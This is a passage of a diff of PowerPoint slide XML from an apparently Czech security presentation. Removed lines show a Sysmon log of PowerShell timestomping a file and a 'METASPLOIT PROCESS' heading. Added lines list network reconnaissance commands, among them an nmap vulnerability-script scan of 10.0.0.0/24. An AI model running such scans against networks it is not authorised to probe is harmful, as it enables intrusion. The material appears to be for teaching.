-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>UtcTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 2019-03-26 21:14:43.489</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ProcessGuid</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: {9CA6D9DA-9643-5C9A-0000-001029551801}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ProcessId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 5620</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
-              <a:t>powershell.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>TargetFilename</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
-              <a:t>GPTP47LXLWQ9XHJFBNUM.temp</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>CreationUtcTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 2019-02-18 07:25:45.895</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>PreviousCreationUtcTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 2019-03-26 21:14:43.489";"2";"4";;"4";"2";"0";"-9223372036854775808";"589777";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:43";;;"Microsoft-Windows-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>Sysmon</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"File creation time changed (rule: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>FileCreateTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.String</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]";"System.Collections.Generic.List`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]"</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:grpSp>
+        <p:nvGrpSpPr>
+          <p:cNvPr id="52" name="Group 51">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F44DEACC-B2E6-413E-B2B5-320225952713}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvGrpSpPr>
+            <a:grpSpLocks noGrp="1" noUngrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1"/>
+          </p:cNvGrpSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvGrpSpPr>
+        <p:grpSpPr>
+          <a:xfrm>
+            <a:off x="886714" y="-4763"/>
+            <a:ext cx="5014912" cy="6862763"/>
+            <a:chOff x="2928938" y="-4763"/>
+            <a:chExt cx="5014912" cy="6862763"/>
+          </a:xfrm>
+        </p:grpSpPr>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="53" name="Freeform 6">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2924236-7127-4774-B233-D9124F0C7757}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3367088" y="-4763"/>
+              <a:ext cx="1063625" cy="2782888"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="670" h="1753">
+                  <a:moveTo>
+                    <a:pt x="0" y="1696"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="1753"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="670" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="430" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="1696"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1"/>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="54" name="Freeform 7">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD053C6F-7187-4EE6-BAD9-1C484F29F919}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="-4763"/>
+              <a:ext cx="1035050" cy="2673350"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="652" h="1684">
+                  <a:moveTo>
+                    <a:pt x="225" y="1684"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="652" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="411" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="1627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="219" y="1681"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="1684"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="65000"/>
+                <a:lumOff val="35000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="55" name="Freeform 25">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{226FAE39-4CC5-465A-ACFE-BE1C0E2F7F51}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="2582862"/>
+              <a:ext cx="2693987" cy="4275138"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="1697" h="2693">
+                  <a:moveTo>
+                    <a:pt x="0" y="0"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="1622" y="2693"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="1697" y="2693"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="85000"/>
+                <a:lumOff val="15000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="56" name="Freeform 26">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{521EE7A0-BD65-4FD1-BD1D-B4674892AC0F}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3371850" y="2692400"/>
+              <a:ext cx="3332162" cy="4165600"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2099" h="2624">
+                  <a:moveTo>
+                    <a:pt x="2099" y="2624"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2021" y="2624"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2099" y="2624"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="50000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="57" name="Freeform 27">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{334E0A56-DA50-4F91-9938-4CDBECA73668}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3367088" y="2687637"/>
+              <a:ext cx="4576762" cy="4170363"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2883" h="2627">
+                  <a:moveTo>
+                    <a:pt x="0" y="0"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="3" y="3"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2102" y="2627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2883" y="2627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="57"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="75000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="58" name="Freeform 28">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD203DCD-B4AF-4693-A330-F23545344A45}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="2578100"/>
+              <a:ext cx="3584575" cy="4279900"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2258" h="2696">
+                  <a:moveTo>
+                    <a:pt x="2258" y="2696"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="264" y="111"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="228" y="60"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="57"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="3"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="1697" y="2696"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2258" y="2696"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="75000"/>
+                <a:lumOff val="25000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+      </p:grpSp>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="11" name="Nadpis 10">
@@ -6931,27 +8301,270 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="0" y="1"/>
-            <a:ext cx="12192000" cy="585926"/>
+            <a:off x="4974632" y="648931"/>
+            <a:ext cx="6390723" cy="871960"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
+            <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>METASPLOIT PROCESS</a:t>
-            </a:r>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr lang="en-US" sz="5400" dirty="0"/>
+              <a:t>SCAN SÍTĚ</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="60" name="Rounded Rectangle 16">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C29A1D40-470D-401E-8548-6FF3CF37797D}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="656694" y="648931"/>
+            <a:ext cx="3982086" cy="5231964"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 4834"/>
+            </a:avLst>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:schemeClr val="bg1"/>
+          </a:solidFill>
+          <a:ln w="38100">
+            <a:gradFill flip="none" rotWithShape="1">
+              <a:gsLst>
+                <a:gs pos="0">
+                  <a:schemeClr val="bg2"/>
+                </a:gs>
+                <a:gs pos="100000">
+                  <a:schemeClr val="bg2">
+                    <a:lumMod val="75000"/>
+                  </a:schemeClr>
+                </a:gs>
+              </a:gsLst>
+              <a:lin ang="5400000" scaled="0"/>
+              <a:tileRect/>
+            </a:gradFill>
+          </a:ln>
+          <a:effectLst>
+            <a:innerShdw blurRad="57150" dist="38100" dir="14460000">
+              <a:srgbClr val="000000">
+                <a:alpha val="70000"/>
+              </a:srgbClr>
+            </a:innerShdw>
+          </a:effectLst>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Obrázek 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF40FA8-7A38-40A5-8C46-9D6194C9BC35}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="977551" y="1876995"/>
+            <a:ext cx="3341190" cy="2816247"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="49" name="Obdélník 48">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA2DE75-D9B1-4CC6-9A31-810E2BD865D9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4993980" y="1870184"/>
+            <a:ext cx="5747938" cy="1815882"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="171450" indent="-171450">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Ipconfig /all on WIN Server</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="171450" indent="-171450">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>nmap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> –</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>sP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> 10.0.0.0/24</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="171450" indent="-171450">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Nmap –</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Pn</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> –script vuln 10.0.0.0/24</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="171450" indent="-171450">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
+              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3419150997"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="974307848"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6980,176 +8593,6 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="8" name="Obdélník 7">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
